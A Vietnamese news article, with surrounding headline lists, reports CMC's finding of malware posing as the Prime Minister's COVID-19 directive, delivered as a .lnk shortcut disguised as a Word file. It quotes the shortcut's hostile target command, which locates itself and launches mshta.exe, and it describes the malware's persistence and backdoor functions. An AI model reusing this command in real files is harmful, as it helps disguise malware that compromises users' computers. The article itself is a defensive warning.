-
Hà Nội sẽ xử lý người thả diều gây ảnh hưởng đến hoạt động bay dịp 2 - 9
-
Chi 200 triệu đồng/tháng nuôi con
-
Lịch cấm đường ngày 30/8 phục vụ lễ tổng duyệt diễu binh, diễu hành A80
-
Lời khai của nghi phạm bắn chết thanh niên gặp bên đường ở Quảng Trị
-
Đừng hâm nóng thứ này trong lò vi sóng, chỉ 3 phút có thể giải phóng hàng tỷ hạt vi nhựa, tế bào người chết hàng loạt
-
Người mẹ hốt hoảng lao vào chốt bảo vệ diễu binh cầu cứu, Đại úy CSGT hành động bất ngờ
-
Được gọi "chồng ơi", Trung uý nổi tiếng khối Kỵ binh không đáp lại: Lý do bất ngờ
-
Chi tiết 178 điểm trông giữ xe miễn phí phục vụ người dân dịp Quốc khánh 2/9
-
Cận 2/9, hàng loạt sự kiện và triển lãm thú vị mà bạn không thể bỏ lỡ: Xem tất cả tại đây!
-
Hôm nay, áp thấp nhiệt đới khả năng thành bão, từ Đà Nẵng trở ra miền Bắc mưa lớn
-
Cận cảnh dàn xe tăng, xe thiết giáp, ngư lôi lần đầu xuất hiện tại triển lãm lớn nhất lịch sử
-
Công bố kết quả nghiên cứu ảnh hưởng của xăng E10 với ô tô, xe máy
-
Cùng đi xem xe, người đàn ông bỏ lại bạn gái rồi lấy xe máy phóng mất hút
-
Cô bé từng xuất hiện trong trận Chung kết Olympia 19 năm trước giờ đã thành Chị Đẹp, cuộc sống thay đổi 180 độ
-
Danh tính nam thanh niên xăm trổ thách thức công an tại chốt bảo vệ sơ duyệt A80
-
Bức ảnh nghiệt ngã: Người trao giải và người nhận giải Miss Audition 2006 đều vướng lao lý
-
TP HCM: Cán bộ, công chức thôi việc sau sắp xếp có thể vay đến 300 triệu đồng
-
Ô tô bất ngờ "sụt hố" trên phố Đội Cấn, Hà Nội
-
Lần đầu tiên người dân có thể bán vàng miếng với giá 127 triệu/lượng
-
Bão số 6 khả năng sắp hình thành, trọng tâm mưa lớn ở miền Trung
Công nghệ
10/03/2020 10:00Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch COVID-19
Thông tin từ Tập đoàn công nghệ CMC cho biết, lợi dụng tình hình căng thẳng của dịch COVID-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển (từng tấn công các tổ chức tại Việt Nam năm 2019), được phát hiện đã thực hiện mạo danh văn 3 bản thông báo của chính phủ về tình hình dịch.
Cụ thể, mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. File mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.
Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i" .
Nếu được thực thi, mã độc nói trên sẽ tự tạo ra các bản sao, đồng thời tự kích hoạt khả năng chạy mỗi khi khởi động máy tính. Bên cạnh đó, mã độc này sẽ tạo backdoor cho phép kẻ tấn công có thể thực thi lệnh từ xa, đồng thời hỗ trợ chạy nhiều lệnh khác nhau như tải file, lấy thông tin máy tính và người dùng.
"Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp" - các chuyên gia của CMC nhận định.
Duy Anh (Nguoiduatin.vn)








- Hà Nội sẽ xử lý người thả diều gây ảnh hưởng đến hoạt động bay dịp 2 - 9 (09:18)
- Bên trong khách sạn bị bỏ hoang ma quái nhất Nhật Bản (09:16)
- HLV Slot tuyên bố nóng hổi Liverpool lại đấu Real Madrid ở Cúp C1 (09:14)
- Giá vàng chưa dứt đà tăng (09:12)
- Người giàu nhất thế giới hiện có bao nhiêu tiền? (09:07)
- Chi 200 triệu đồng/tháng nuôi con (24 phút trước)
- Những điều nên làm và không nên làm trong ngày Thất tịch (26 phút trước)
- Khoảnh khắc hiếm có, 2 nàng dâu của tỷ phú Phạm Nhật Vượng chung một khung hình (35 phút trước)
- Siêu máy tính Opta chỉ ra "bảng tử thần" tại Champions League (36 phút trước)
- Lịch cấm đường ngày 30/8 phục vụ lễ tổng duyệt diễu binh, diễu hành A80 (38 phút trước)




